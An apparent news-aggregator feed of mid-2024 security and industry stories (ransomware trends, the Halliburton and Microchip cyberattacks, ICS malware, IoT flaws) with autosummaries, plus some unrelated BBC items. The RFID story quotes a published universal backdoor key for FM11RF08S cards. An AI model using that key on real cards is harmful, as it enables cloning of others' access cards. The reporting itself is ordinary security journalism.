    In this Help Net Security interview, Tim West, Director of Threat Intelligence and Outreach at WithSecure, discusses Ransomware-as-a-Service (RaaS) with a focus on how these cybercriminal operations are adapting to increased competition, shifting structures, and a fragmented ecosystem. West talks about the implications of these changes for targeted industries, particularly engineering and manufacturing, and examines ransomware actors’ growing reliance on dual-use tools. How has the ransomware-as-a-service (RaaS) landscape evolved? Are we seeing a shift in … More

    The post How ransomware tactics are shifting, and what it means for your business appeared first on Help Net Security.

    "

    Autosummary: The tools we found to be commonly used by RaaS actors included PDQ Connect, Action1, AnyDesk, and TeamViewer for remote access, as well as rclone, rsync, Megaupload, and FileZilla for data exfiltration. In this Help Net Security interview, Tim West, Director of Threat Intelligence and Outreach at WithSecure, discusses Ransomware-as-a-Service (RaaS) with a focus on how these cybercriminal operations are adapting to increased competition, shifting structures, and a fragmented ecosystem. At the same time, from a defender’s perspective, the mistrust among cybercriminals is beneficial, as it likely makes them less effective, less efficient, and easier to defend against. Proprietary data and intellectual property (IP), including designs, blueprints, and trade secrets, are critical to maintaining a competitive edge, and therefore lucrative assets for theft or sale. At the same time, traditional defences against ransomware encryption, such as backup strategies and network segmentation, remain important. "


    U.S. oil giant Halliburton disclosed a data breach

    financial industry
    2024-09-03 https://securityaffairs.com/168002/data-breach/halliburton-data-breach.html
    U.S. oil company Halliburton disclosed a data breach following the RansomHub ransomware gang attack that occurred in August. In August, Halliburton, a major U.S. oil company, announced that a cyberattack hit its IT infrastructure, particularly impacting operations at its Houston offices. Halliburton Company is an American multinational corporation and the world’s second largest oil service company which is […] "

    Autosummary: “The Company remains subject to various risks due to the incident, including the adequacy of processes during the period of disruption, diversion of management’s attention, potential litigation, changes in customer behavior, and regulatory scrutiny.” continues the document. "


    Young workers drive South Africa's video games industry

    industry
    2024-09-02 https://www.bbc.com/news/articles/c6ppjq0zz1go
    South Africa has a small but thriving video games industry, helped by plenty of young workers. "

    Autosummary: “These days we’ve got a truly diverse cross section of South Africa coming to the event, all ages, races, and genders,” says rAge project director, Michael James. “Though on the surface things may seem to be moving slowly right now, when a lot of these new projects, teams, and companies reveal themselves, there is going to be a massive wave of South African content in the industry.” [Image: Carina Cristovao. Rodwin Malinga sees a "massive wave" of South African games content coming] As well as having a new wave of game developers, South Africa is a growing market for games themselves, points out Chris Beer, an analyst at GWI. "


    SANS Institute Unveils Critical Infrastructure Strategy Guide for 2024: A Call to Action for Securing ICS/OT Environments

    industry
    2024-08-30 https://thehackernews.com/2024/08/sans-institute-unveils-critical.html
    A comprehensive guide authored by Dean Parsons emphasizes the growing need for specialized ICS security measures in the face of rising cyber threats. With a staggering 50% increase in ransomware attacks targeting industrial control systems (ICS) in 2023, the SANS Institute is taking decisive action by announcing the release of its essential new strategy guide, "ICS Is the Business: Why Securing "

    Autosummary: "These are the attacks that keep security CSOs, VP of Engineering and others responsible for ICS cyber defense, safety, and risk management, up at night," Parsons notes. "


    Cybercriminals capitalize on travel industry’s peak season

    industry ciber
    2024-08-28 https://www.helpnetsecurity.com/2024/08/28/cybercriminals-capitalize-travel-season/

    Cybercriminals are capitalizing on the travel and hospitality industry’s peak season, using increased traffic as cover for their attacks, according to Cequence Security. Researchers investigated the top 10 travel and hospitality sites to identify externally visible edge, cloud infrastructure, application stack, API hosts, and security vulnerabilities. Threat researchers observed a consistent pattern across industries: increased website traffic during peak seasons, like the travel and hospitality industry’s vacation and holiday periods, coincides with a surge in … More

    The post Cybercriminals capitalize on travel industry’s peak season appeared first on Help Net Security.

    "

    Autosummary: Researchers investigated the top 10 travel and hospitality sites to identify externally visible edge, cloud infrastructure, application stack, API hosts, and security vulnerabilities. "


    Old devices, new dangers: The risks of unsupported IoT tech

    industry
    2024-08-27 https://www.welivesecurity.com/en/internet-of-things/old-devices-new-dangers-the-risks-of-unsupported-iot-tech/
    In the digital graveyard, a new threat stirs: Out-of-support devices becoming thralls of malicious actors "

    Autosummary: However, the takeaway from all this is that you should always keep your devices updated, and when that is not possible, try to dispose of them securely (wiping old data), replace them with a new device after secure disposal, or find them a new, much-less-connected purpose. Devices such as cameras, teleconferencing systems, routers, and smart locks have operating systems or firmware that, once obsolete, no longer receive security updates, leaving the door open to hacking or other misuse. "


    Fraud tactics and the growing prevalence of AI scams

    financial industry
    2024-08-23 https://www.helpnetsecurity.com/2024/08/23/fraud-tactics-ai-scams/

    In the first six months of 2024, Hiya flagged nearly 20 billion calls as suspected spam – more than 107 million spam calls every day. The data showed spam flag rates of more than 20% of unknown calls (calls coming from outside of someone’s address book) in 25 out of the 42 countries – with some spam flag rates above 50%. The first half of 2024 also saw an increase in AI deepfake scams, which use … More

    The post Fraud tactics and the growing prevalence of AI scams appeared first on Help Net Security.

    "

    Autosummary: The spam flag rate varies state by state, with Oklahoma, Indiana, and Ohio having the highest spam rates in H1, while Alaska, New York, and North Dakota had the lowest. "


    The changing dynamics of ransomware as law enforcement strikes

    exploits ransomware industry
    2024-08-23 https://www.helpnetsecurity.com/2024/08/23/changing-dynamics-of-ransomware/

    After peaking in late 2023, the ransomware industry is beginning to stabilize in productivity, with notable developments in ransomware targets, and industry dynamics, according to WithSecure. [Figure: Sectors impacted by ransomware (Source: WithSecure)] While ransomware productivity has shown signs of leveling off in 2024, the frequency of attacks and ransom payments collected remained higher in the first half of 2024 than in 2022 and 2023. “There has been a marked shift towards targeting small and medium-sized … More

    The post The changing dynamics of ransomware as law enforcement strikes appeared first on Help Net Security.

    "

    Autosummary: "


    US oil giant Halliburton confirms cyberattack behind systems shutdown

    industry ciber
    2024-08-23 https://www.bleepingcomputer.com/news/security/us-oil-giant-halliburton-confirms-cyberattack-behind-systems-shutdown/
    Halliburton, one of the world's largest providers of services to the energy industry, has confirmed a cyberattack that forced it to shut down some of its systems earlier this week. [...] "

    Autosummary: "On August 21, 2024, Halliburton Company (the "Company") became aware that an unauthorized third party gained access to certain of its systems," the oil services giant said in a filing with the U.S. Securities and Exchange Commission (SEC). "


    A cyberattack hit US oil giant Halliburton

    industry ciber
    2024-08-22 https://securityaffairs.com/167435/hacking/halliburton-cyberattack.html
    US oil giant Halliburton announced that it was hit by a cyberattack that is affecting operations at its Houston, Texas offices. Halliburton, a major U.S. oil company, announced that a cyberattack hit its IT infrastructure, particularly impacting operations at its Houston offices. Halliburton Company is an American multinational corporation and the world’s second largest oil service company which […] "

    Autosummary: A cyberattack hit US oil giant Halliburton. Pierluigi Paganini, August 22, 2024. US oil giant Halliburton announced that it was hit by a cyberattack that is affecting operations at its Houston, Texas offices. "


    A backdoor in millions of Shanghai Fudan Microelectronics RFID cards allows cloning

    industry
    2024-08-21 https://securityaffairs.com/167321/hacking/shanghai-fudan-microelectronics-rfid-cards-backdoor.html
    A flaw in millions of RFID cards manufactured by Shanghai Fudan Microelectronics allows these contactless cards to be cloned instantly. Researchers from security firm Quarkslab discovered a backdoor in millions of RFID cards manufactured by the Chinese chip manufacturer Shanghai Fudan Microelectronics. The experts announced the discovery of a hardware backdoor and successfully cracked its […] "

    Autosummary: A backdoor in millions of Shanghai Fudan Microelectronics RFID cards allows cloning. Pierluigi Paganini, August 21, 2024. A flaw in millions of RFID cards manufactured by Shanghai Fudan Microelectronics allows these contactless cards to be cloned instantly. A396EFA4E24F (Listing 9: FM11RF08S universal backdoor key) “Tests show that once authenticated, we can read all user blocks, even if the trailer block access rights indicate that data blocks are not readable. "


    Trinidad and Tobago refloats mystery oil spill tanker

    industry
    2024-08-21 https://www.bbc.com/news/articles/c5y52r5568vo
    Some 50,000 barrels of oil have leaked since the ship overturned off the Caribbean nation's coast in February. "

    Autosummary: "


    Microchip Technology manufacturing facilities impacted by cyberattack

    industry ciber
    2024-08-21 https://www.helpnetsecurity.com/2024/08/21/microchip-technology-cyberattack/

    American semiconductor manufacturer Microchip Technology Incorporated has had some of its business operations disrupted by a cyberattack. “As a result of the incident, certain of the Company’s manufacturing facilities are operating at less than normal levels, and the Company’s ability to fulfill orders is currently impacted,” the company revealed in a SEC filing on Tuesday. What is known about the cyberattack? Microchip Technology detected potentially suspicious activity involving its IT systems on August 17, 2024. … More

    The post Microchip Technology manufacturing facilities impacted by cyberattack appeared first on Help Net Security.

    "

    Autosummary: Its products are used by companies in a variety of industries, including automotive, communications, computing, medical, aerospace and defense. "


    Organizations turn to biometrics to counter deepfakes

    industry
    2024-08-20 https://www.helpnetsecurity.com/2024/08/20/deepfakes-threat/

    The risk of deepfakes is rising with 47% of organizations having encountered a deepfake and 70% of them believing deepfake attacks which are created using generative AI tools, will have a high impact on their organizations, according to iProov. Perceptions of AI are hopeful as 68% of organizations believe that while it’s impactful at creating cybersecurity threats, 84% find it’s instrumental in protecting against them. This is according to a new global survey of technology … More

    The post Organizations turn to biometrics to counter deepfakes appeared first on Help Net Security.

    "

    Autosummary: Unsurprisingly, deepfakes are now tied for third place amongst the most prevalent concerns for survey respondents with the following order: password breaches (64%), ransomware (63%), phishing/social engineering attacks (61%), and deepfakes (61%). APAC (81%), European (72%), and North American (71%) organizations are significantly more likely than LATAM organizations (54%) to believe deepfake attacks will have an impact on their organization. "


    Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics

    industry
    2024-08-16 https://thehackernews.com/2024/08/multi-stage-valleyrat-targets-chinese.html
    Chinese-speaking users are the target of an ongoing campaign that distributes malware known as ValleyRAT. "ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and deploy arbitrary plugins to cause further damage," Fortinet FortiGuard Labs researchers Eduardo Altares and Joie Salvio said. "Another noteworthy characteristic of this malware is its "

    Autosummary: The attack sequence is a multi-stage process that starts with a first-stage loader that impersonates legitimate applications like Microsoft Office to make them appear harmless (e.g., "工商年报大师.exe" or "补单对接更新记录txt.exe"). "


    Key metrics for monitoring and improving ZTNA implementations

    industry
    2024-08-13 https://www.helpnetsecurity.com/2024/08/13/dean-hamilton-wilson-perumal-company-ztna-implementation/

    In this Help Net Security interview, Dean Hamilton, CTO at Wilson Perumal & Company, discusses the complexities of zero trust network access (ZTNA) implementation, focusing on balancing security with operational efficiency. Hamilton highlights strategic planning, collaboration between IT and business leaders, adapting to emerging challenges, continuous improvement, and using metrics to assess ZTNA success and manage risks. ZTNA implementation is associated with increased IT spending and operational complexity. How can businesses strike a balance between … More

    The post Key metrics for monitoring and improving ZTNA implementations appeared first on Help Net Security.

    "

    Autosummary: Careful up-front investment in three key areas is critical to finding balance for IT and avoiding adverse impacts on the business: Enterprise Architecture (EA) management is the practice of documenting and understanding how IT resources (infrastructure, services, applications, and data) align with business objectives, organizational elements, and business processes. While some of that spending is associated with licenses for enablement technologies that provide granular network segmentation, policy management, policy enforcement, device assessment, etc., the majority of the increased cost comes from the operational overhead required to define and maintain granular network and application access policies that are calibrated to the specific needs of each business. Rate of valid business user trouble tickets requiring policy modification; time to resolve business user policy-related tickets; time to detect policy misconfiguration; time to resolve policy misconfiguration; engagement of non-IT end-users in policy updates; cybersecurity literacy of executives and business leaders. What new challenges and opportunities should organizations anticipate as they refine their ZTNA strategies? "


    Industrial Remote Access Tool Ewon Cosy+ Vulnerable to Root Access Attacks

    industry
    2024-08-12 https://thehackernews.com/2024/08/industrial-remote-access-tool-ewon-cosy.html
    Security vulnerabilities have been disclosed in the industrial remote access solution Ewon Cosy+ that could be abused to gain root privileges to the devices and stage follow-on attacks. The elevated access could then be weaponized to decrypt encrypted firmware files and encrypted data such as passwords in configuration files, and even get correctly signed X.509 VPN certificates for foreign "

    Autosummary: "An unauthenticated attacker can gain root access to the Cosy+ by combining the found vulnerabilities and e.g., waiting for an admin user to log in to the device," Abrell said. "


    Musk shares faked far-right "detainment camp" for rioters post

    industry
    2024-08-08 https://www.bbc.com/news/articles/cp35w0kj2y4o
    The image was faked to look like it had come from the Daily Telegraph website. "

    Autosummary: "


    Take action now over riot posts, social media firms told

    industry
    2024-08-08 https://www.bbc.com/news/articles/c2076n7w4qlo
    The government and the media regulator have faced criticism for not intervening sooner. "

    Autosummary: "


    OpenWrt dominates, but vulnerabilities persist in OT/IoT router firmware

    industry
    2024-08-07 https://www.helpnetsecurity.com/2024/08/07/ot-iot-router-firmware-vulnerabilities/

    Forescout has published a new report examining the current state of the software supply chain in OT/IoT routers. The study uncovered that OT and IoT cellular routers and those used in small offices and homes contain outdated software components associated with known (“n-day”) vulnerabilities. The research showed that widely used OT/IoT router firmware images have, on average, 20 exploitable n-day vulnerabilities affecting the kernel, leading to increasing security risks. Number of historical vulnerabilities by CVSS … More

    The post OpenWrt dominates, but vulnerabilities persist in OT/IoT router firmware appeared first on Help Net Security.

    "

    Autosummary: On average, 41% of binaries across firmware images use RELRO, 31% use stack canaries, 65% use NX, 75% use PIE, 4% use RPath, and 35% have debugging symbols. On average, firmware images had 161 known vulnerabilities in their most common components: 68 with a low or medium CVSS score, 69 with a high score, and 24 with a critical score. "


    The real story of the news website accused of fuelling riots

    industry
    2024-08-07 https://www.bbc.com/news/articles/c5y38gjp4ygo
    The BBC tracks down a Canadian hockey player, a dad in Pakistan and a Texan named Kevin linked to Channel3Now. "

    Autosummary: Kevin claims there are “more than 30” people in the US, UK, Pakistan and India who work for the site, usually recruited from sites for freelancers - including Farhan and James. The BBC has tracked down several people linked to Channel3Now, spoken to their friends and colleagues, who have corroborated that they are real people, and questioned a person who claims to be the “management” at the site. He says how Farhan in particular was not involved in the false Southport story, which the site has publicly apologised for, and blamed “our UK-based team”. Kevin says he is speaking to me from the site’s “main office” in the US - which fits with both the timings of the social media posts on some of the site's social media profiles, and the times Kevin replies to my emails. "


    Venezuela"s economy runs on oil - and music

    industry
    2024-07-28 https://www.bbc.com/news/articles/c51y9r0jgxno
    Venezuela"s battered economy is one of the key battlegrounds in Sunday"s presidential election. "

    Autosummary: Unfortunately, however, those policies have done little or nothing to tackle the economy's underlying structural problems - chiefly, its historic dependence on oil, to the detriment of other sectors. But at the same time, they neglected to invest in maintaining the level of oil production, which has plummeted in recent years - partly, but not solely, as a result of US sanctions. "


    Terrorist Activity is Accelerating in Cyberspace – Risk Precursor to Summer Olympics and Elections

    industry
    2024-07-26 https://securityaffairs.com/166179/breaking-news/terrorist-activity-alarm-terrorist-attacks.html
    Terrorist groups are increasingly using cyberspace and digital communication channels to plan and execute attacks. Yesterday Federal Bureau of Investigation (FBI) Director Christopher Wray expressed growing concerns over the potential for a coordinated foreign terrorist attack in the United States. During his testimony to the House Oversight Committee, Mr. Wray cited the ISIS-K attack on […] "

    Autosummary: According to experts, one of the key issues is tracking high-risk individuals who may misuse financial services, such as banks, e-commerce platforms, and payment networks, to engage in illegal activities, including money laundering and terrorism financing. "


    Cybersecurity ROI: Top metrics and KPIs

    industry ciber
    2024-07-24 https://www.helpnetsecurity.com/2024/07/24/karthik-swarnam-armorcode-cybersecurity-roi/

    In this Help Net Security interview, Karthik Swarnam, Chief Security and Trust Officer at ArmorCode, discusses key metrics and KPIs to measure cybersecurity ROI. Swarnam shares strategies for enhancing ROI through proactive measures and effective communication with executive leadership. What are the primary metrics and KPIs used to measure the ROI of cybersecurity investments? Today, cybersecurity investments are evaluated not just for cost avoidance but for a much broader range of benefits. These metrics include: … More

    The post Cybersecurity ROI: Top metrics and KPIs appeared first on Help Net Security.

    "

    Autosummary: To improve cybersecurity ROI, security professionals should: Establish clear metrics: Define and measure key metrics across various domains such as identity & access management, risk remediation, software development, data loss prevention, and messaging security. Tool rationalization: By leveraging a governance layer, organizations can eliminate redundant security tools, optimizing their security investments. Traditional metrics for this measurement include the number of detected incidents, Mean Time to Detect (MTTD), Mean Time to Respond (MTTR), and patch management (average time to deploy fixes). "


    Hot topics: Can’t-miss sessions at Mandiant’s 2024 mWISE event

    industry
    2024-07-24 https://www.bleepingcomputer.com/news/security/hot-topics-cant-miss-sessions-at-mandiants-2024-mwise-event/
    Now that the mWISE 2024 session catalog is out, it's time to take a closer look at the topics. Learn more from @mWISEConference about the three hottest tracks in this year's conference. [...] "

    Autosummary: The Dark Side of Innovation: Generative AI in Cybercrime A look at how GenAI tools are being used in cybercrime, including phishing attacks crafted with AI-generated content, the use of deepfakes for identity fraud, and AI-driven network intrusion techniques. "


    Smashing Security podcast #382: CrowdStrike, Dark Wire, and the Paris Olympics

    industry
    2024-07-24 https://grahamcluley.com/smashing-security-podcast-382/
    Computers blue-screen-of-death around the world! The Paris Olympics is at risk of attack! And the FBI pull off the biggest sting operation in history by running a secret end-to-end encrypted messaging app! All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by industry veterans Graham Cluley and … Continue reading "Smashing Security podcast #382: CrowdStrike, Dark Wire, and the Paris Olympics" "

    Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Joseph Cox – @josephfcox Episode links: Sponsored by: 1Password Extended Access Management – Secure every sign-in for every app on every device. "


    New ICS Malware "FrostyGoop" Targeting Critical Infrastructure

    exploits industry
    2024-07-23 https://thehackernews.com/2024/07/new-ics-malware-frostygoop-targeting.html
    Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January. Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP "

    Autosummary: It"s also the ninth ICS-focused malware after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, and COSMICENERGY. "


    FrostyGoop ICS malware targets Ukraine

    exploits industry
    2024-07-23 https://securityaffairs.com/166087/malware/frostygoop-ics-malware-modbus.html
    In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems using the Modbus protocol. FrostyGoop is the ninth ICS malware that was discovered and that a nation-state […] "

    Autosummary: FrostyGoop ICS malware targets Ukraine. Pierluigi Paganini, July 23, 2024. In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. "


    Cross-industry standards for data provenance in AI

    industry
    2024-07-22 https://www.helpnetsecurity.com/2024/07/22/saira-jesani-data-trust-alliance-data-provenance-standards/

    In this Help Net Security interview, Saira Jesani, Executive Director of the Data & Trust Alliance, discusses the role of data provenance in AI trustworthiness and its impact on AI models’ performance and reliability. Jesani highlights the collaborative process behind developing cross-industry metadata standards to address widespread data provenance challenges and ensure applicability across various sectors. Can you explain why data provenance is critical for AI trustworthiness and how it impacts AI models’ overall performance … More

    The post Cross-industry standards for data provenance in AI appeared first on Help Net Security.

    "

    Autosummary: This diverse group of contributors with functions including chief technology officers, chief data officers, and leaders in data governance, data acquisition, data quality, privacy, legal, and compliance ensured that the standards address common challenges and needs across multiple industries. They included American Express, Humana, IBM, Mastercard, Nielsen, Pfizer, UPS, and Walmart. As AI systems become more integrated into various sectors, the adoption of these standards can help ensure that data used in AI applications is reliable and legally compliant, thereby mitigating risks related to privacy, copyright, and brand protection. "


    Ten footballers to watch out for at Paris Olympics

    industry
    2024-07-22 https://www.bbc.com/sport/football/articles/cek91m98g48o
    From Manchester City"s Julian Alvarez to Brazil icon Marta, BBC Sport picks out 10 footballers to watch at the Olympics. "

    Autosummary: "


    Automated Threats Pose Increasing Risk to the Travel Industry

    industry
    2024-07-18 https://thehackernews.com/2024/07/automated-threats-pose-increasing-risk.html
    As the travel industry rebounds post-pandemic, it is increasingly targeted by automated threats, with the sector experiencing nearly 21% of all bot attack requests last year. That’s according to research from Imperva, a Thales company. In their 2024 Bad Bot Report, Imperva finds that bad bots accounted for 44.5% of the industry’s web traffic in 2023—a significant jump from 37.4% in 2022.  "

    Autosummary: Time-sensitive, high-value travel transactions enable quick monetization, often before fraud is detected, resulting in financial losses, damaged customer trust, and harm to the company's reputation. Therefore, Imperva advocates for layered defenses, including user behavior analysis, profiling, and fingerprinting, as essential measures for the travel industry. Imperva suggests several quick wins, such as blocking outdated browser versions, restricting access from bulk IP data centers, and implementing detection strategies for signs of automation, like unusually fast interactions. These are some of the most common ways travel-related applications are targeted daily: Fare Scraping: The use of bots to aggregate pricing information, inventories, discounted fares, and more. "


    Is Brazil"s Brics-building worth it?

    latam industry
    2024-07-14 https://www.bbc.com/news/articles/c0venrydg8yo
    The Brazilian president sees the Brics as a way to remake the world - but it is dominated by China. "

    Autosummary: In that time, President Lula's comeback has given renewed force to one of the world's most unlikely economic alliances - the Brics, a grouping that unites Brazil with Russia, India, China and South Africa. By Robert Plummer, BBC News. Lula's Brazil is keen to promote the Brics, but it is dwarfed by Xi Jinping's China. It's been more than a year-and-a-half since Brazil's Luiz Inácio Lula da Silva returned to the country's presidency, back from the political dead after his conviction on corruption charges was dramatically annulled. Rodrigo Zeidan, a Brazilian economist based at China's New York University Shanghai, tells the BBC that Brazil and China alike see the Brics as a "hedge" in terms of global alliances, rather than as a top priority. "


    Ever Wonder How Hackers Really Steal Passwords? Discover Their Tactics in This Webinar

    industry
    2024-07-12 https://thehackernews.com/2024/07/ever-wonder-how-hackers-really-steal.html
    In today"s digital age, passwords serve as the keys to our most sensitive information, from social media accounts to banking and business systems. This immense power brings with it significant responsibility—and vulnerability. Most people don"t realize their credentials have been compromised until the damage is done. Imagine waking up to drained bank accounts, stolen identities, or a company"s "

    Autosummary: " What You"ll Learn: In this webinar, Tim Chase will delve into the world of compromised credentials, covering: The Anatomy of an Attack : Understand how attackers steal and exploit credentials through phishing and brute force. "


    Ticket Heist fraud gang uses 700 domains to sell fake Olympics tickets

    industry
    2024-07-10 https://www.bleepingcomputer.com/news/security/ticket-heist-fraud-gang-uses-700-domains-to-sell-fake-olympics-tickets/
    A large-scale fraud campaign with over 700 domain names is likely targeting Russian-speaking users looking to purchase tickets for the Summer Olympics in Paris. [...] "

    Autosummary: Ticket Heist website for UEFA EURO 24 Championship source: QuoIntelligence Additionally, the researchers discovered websites in this fraudulent activity that claimed to sell tickets to music concerts featuring famous bands like Twenty One Pilots, Iron Maiden, Metallica, Rammstein, and musicians (Bruno Mars, Ludovico Einaudi). “For example, a random event and seat location on the official website could cost less than EUR 100, whereas the same tickets and locations on the fraudulent websites were priced at a minimum of EUR 300, often reaching EUR 1,000” - QuoIntelligence QuoIntelligence threat researcher Andrei Moldovan told BleepingComputer that while there is no confirmation, the higher prices could be part of a trick to make victims believe they get “premium treatment” for the extra money since the tickets are not available through the official distribution channels. "


    Understanding IoT security risks and how to mitigate them | Cybersecurity podcast

    industry ciber
    2024-07-10 https://www.welivesecurity.com/en/videos/understanding-iot-security-risks-mitigate-cybersecurity-podcast/
    As security challenges loom large on the IoT landscape, how can we effectively counter the risks of integrating our physical and digital worlds? "

    Autosummary: "


    Align strengthens defense against double-extortion ransomware tactics

    exploits ransomware industry
    2024-07-09 https://www.helpnetsecurity.com/2024/07/09/align-exfiltration-prevention-feature/

    Align adds a new exfiltration prevention feature to its Align Guardian Managed Detection and Response offering, powered by Adlumin. This innovation is designed to detect and stop attackers from exfiltrating data, providing a defense against modern ransomware tactics that employ double-extortion techniques. The new ransomware and exfiltration prevention feature complements Guardian’s existing ransomware prevention capabilities, which already stop ransomware encryption fast enough to save 99% of files. This comprehensive approach now protects organizations from both … More

    The post Align strengthens defense against double-extortion ransomware tactics appeared first on Help Net Security.

    "

    Autosummary: "


    99% of IoT exploitation attempts rely on previously known CVEs

    exploits industry
    2024-07-05 https://www.helpnetsecurity.com/2024/07/05/iot-security-privacy-challenges/

    The explosion of Internet of Things (IoT) devices has brought about a wide range of security and privacy challenges, according to Bitdefender and NETGEAR. The report is based on global telemetry of 3.8 million homes and 50 million IoT devices that generated 9.1 billion security events over the course of 12 months. High vulnerabilities found in TVs, smart plugs, DVRs With over 15 billion connected devices globally, from smart home appliances to industrial equipment, the … More

    The post 99% of IoT exploitation attempts rely on previously known CVEs appeared first on Help Net Security.

    "

    Autosummary: Across all device types, denial of service (DoS) attacks appear to be the most common type of vulnerability, with significant percentages observed for TV sets (36.7%), smart plugs (22.2%), DVRs (17.7%), routers (13.4%), and set-top boxes (6.9%). "


    Google Pixel 6 series phones bricked after factory reset

    industry
    2024-07-02 https://www.bleepingcomputer.com/news/google/google-pixel-6-series-phones-bricked-after-factory-reset/
    Multiple owners of Google Pixel 6 series phones (6, 6a, 6 Pro) have been reporting in the past week that their devices were "bricked" after they performed a factory reset. [...] "

    Autosummary: Until the situation clears up, Google Pixel 6, 6a, and 6 Pro owners should not perform factory resets and take regular backups on a separate device. "


    Researchers Warn of Flaws in Widely Used Industrial Gas Analysis Equipment

    industry
    2024-06-28 https://thehackernews.com/2024/06/researchers-warn-of-flaws-in-widely.html
    Multiple security flaws have been disclosed in Emerson Rosemount gas chromatographs that could be exploited by malicious actors to obtain sensitive information, induce a denial-of-service (DoS) condition, and even execute arbitrary commands. The flaws impact GC370XA, GC700XA, and GC1500XA and reside in versions 4.1.5 and prior. According to operational technology (OT) security firm Claroty, the "

    Autosummary: "


    India reviews iPhone factory for "not hiring married women"

    industry
    2024-06-27 https://www.bbc.com/news/articles/cydvp336y3no
    The firm has come under the scanner for allegedly not employing married women at its factory in Tamil Nadu state. "

    Autosummary: "


    Exploding batteries spark deadly S Korea factory fire

    industry
    2024-06-24 https://www.bbc.com/news/articles/crgggmeyjj7o
    At least 22 people have been confirmed dead while eight others were injured, local authorities say. "

    Autosummary: Whatever the cause, once the fire took hold, it would have spread at speed - giving the workers little time to escape, according to Kim Jae-ho, fire and disaster prevention professor at Daejeon University. "


    Crown Equipment cyberattack confirmed, manufacturing disrupted for weeks

    industry ciber
    2024-06-20 https://www.helpnetsecurity.com/2024/06/20/crown-equipment-cyberattack/

    Ohio-based Crown Equipment, which is among the largest industrial and forklift truck manufacturers in the world, has become a victim of a cyberattack “by an international cybercriminal organization,” the company has finally confirmed to its employees on Tuesday. The confirmation came nine days after the company’s network went down (on June 9) and eight days after its manufacturing plants came to a standstill (on June 10), as reported by German security blogger Günter … More

    The post Crown Equipment cyberattack confirmed, manufacturing disrupted for weeks appeared first on Help Net Security.

    "

    Autosummary: "


    CosmicSting flaw impacts 75% of Adobe Commerce, Magento sites

    industry
    2024-06-20 https://www.bleepingcomputer.com/news/security/cosmicsting-flaw-impacts-75-percent-of-adobe-commerce-magento-sites/
    A vulnerability dubbed "CosmicSting" impacting Adobe Commerce and Magento websites remains largely unpatched nine days after the security update has been made available, leaving millions of sites open to catastrophic attacks. [...] "

    Autosummary: " Apply fix or mitigation now The vendor released fixes for CVE-2024-34102 with the following versions, which e-commerce platform administrators are recommended to apply as soon as possible: Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Extended Support 2.4.3-ext-8, 2.4.2-ext-8, 2.4.1-ext-8, 2.4.0-ext-8, 2.3.7-p4-ext-8 Magento Open Source 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Webhooks Plugin version 1.5.0 Sansec recommends that site admins switch to "Report-Only" mode before upgrading to avoid an issue that may break checkout functionality. "


    UNC3886 Uses Fortinet, VMware 0-Days and Stealth Tactics in Long-Term Spying

    industry
    2024-06-19 https://thehackernews.com/2024/06/chinese-cyber-espionage-group-exploits.html
    The China-nexus cyber espionage actor linked to the zero-day exploitation of security flaws in Fortinet, Ivanti, and VMware devices has been observed utilizing multiple persistence mechanisms in order to maintain unfettered access to compromised environments. "Persistence mechanisms encompassed network devices, hypervisors, and virtual machines, ensuring alternative channels remain available "

    Autosummary: " Some of the other malware families delivered during the course of attacks aimed at VMware instances are below - A trojanized version of a legitimate TACACS daemon with credential-logging functionality VIRTUALSHINE, a VMware VMCI sockets-based backdoor that provides access to a bash shell VIRTUALPIE, a Python backdoor that supports file transfer, arbitrary command execution, and reverse shell capabilities VIRTUALSPHERE, a controller module associated with a VMCI-based backdoor Over the years, virtual machines have become lucrative targets for threat actors owing to their widespread use in cloud environments. "


    Crown Equipment confirms a cyberattack disrupted manufacturing

    industry ciber
    2024-06-19 https://www.bleepingcomputer.com/news/security/crown-equipment-confirms-a-cyberattack-disrupted-manufacturing/
    Forklift manufacturer Crown Equipment confirmed today that it suffered a cyberattack earlier this month that disrupted manufacturing at its plants. [...] "

    Autosummary: With IT systems down, employees have been unable to clock in their hours, access service manuals, and, we are told, deliver machinery in some cases. "


    The Financial Dynamics Behind Ransomware Attacks

    financial exploits ransomware industry
    2024-06-18 https://securityaffairs.com/164636/cyber-crime/financial-dynamics-ransomware-attacks.html
    Over the last few years, ransomware attacks have become one of the most prevalent and expensive forms of cybercrime. Initially, these attacks involved malicious software that encrypts a victim’s data, rendering it inaccessible until a ransom is paid to the attackers. Today, this tactic has evolved, where ransomware operators in nearly every case first exfiltrate […] "

    Autosummary: A multi-pronged approach, including strengthening cyber defenses, improving regulations, and raising awareness, is crucial to mitigating the risk and impact of ransomware. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications. "


    Argus Cyber Security and Microsoft partner to secure automotive fleets throughout the vehicle lifecycle

    industry
    2024-06-17 https://www.helpnetsecurity.com/2024/06/17/argus-cyber-security-microsoft-collaboration/

    Argus Cyber Security is collaborating with Microsoft to build a next generation, end-to-end platform for automotive and mobility security. This Argus Vehicle Security Platform consists of two integrated solutions that combine Argus’ automotive cybersecurity portfolio with robust software development and security products from Microsoft, one of the world’s most innovative technology companies and a leader in GenAI. In recent years, vehicle manufacturers have come to realize the importance of Software Defined Vehicles (SDV) and integrating … More

    The post Argus Cyber Security and Microsoft partner to secure automotive fleets throughout the vehicle lifecycle appeared first on Help Net Security.

    "

